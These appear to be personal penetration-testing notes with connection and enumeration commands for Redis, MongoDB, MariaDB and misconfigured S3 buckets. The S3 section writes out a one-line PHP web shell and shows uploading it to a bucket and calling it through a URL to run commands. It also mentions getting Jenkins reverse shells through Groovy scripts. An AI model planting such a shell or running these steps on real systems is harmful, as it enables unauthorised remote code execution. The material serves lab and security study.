Services Pentest Notes
Port: 6379
Connect to a redis server:
redis-cli -h <host>
Obtain the information:
Select database:
Obtain all keys in a database:
Get a value from a key:
GET <key_name>
Port: 27017
The tool to interact with mongodb server is mongo from mongodb-clients package.
Connect to Mongodb server:
mongo <host>
List all databases:
show dbs
Use database:
use <db_name>
List Collections:
show collections
List objects in a collection in a easy read format:
Connect to a mariadb server:
mariadb -u <username> -h <host>
List databases:
show databases;
Use database:
use <database name>
List tables from a database:
show tables;
S3 Bucket
A quick Google search containing the keywords "s3 subdomain status running" returns this result stating that S3 is a cloud-based object storage service. It allows us to store things in containers called buckets. AWS S3 buckets have various use-cases including Backup and Storage, Media Hosting, Software Delivery, Static Website etc. The files stored in the Amazon S3 bucket are called S3 objects
We can interact with this S3 bucket with the aid of the
To configure aws:
aws configure
(If the server does not check the authentication we can just append some random values and be able to interact with the bucket)List S3 buckets:
aws --endpoint=http://<domain> s3 ls
Get the contents of a bucket:
aws --endpoint=http://<domain> s3 ls s3://<bucket>
We can upload files such as a shell:
aws --endpoint=http://<domain> s3 cp shell.php s3://<bucket>
In some cases where the apache server is hosting the website in a bucket and we have access to that bucket we can upload a shell as a php file and since it is the webroot we can access and for that matter execute it. An example is
echo '<?php system($_GET["cmd"]); ?>' > shell.php
https://<domain>/shell.php?cmd=<command here>
Login Info
It is kinda hard or maybe impossible to bruteforce the magento login because it has already by default some nasty security standards.
Once we get a foothold on jenkins we can get a possible reverse shell or remote code execution on the target machine since we can run grovvy scripts.
We can find a script here.
Last updated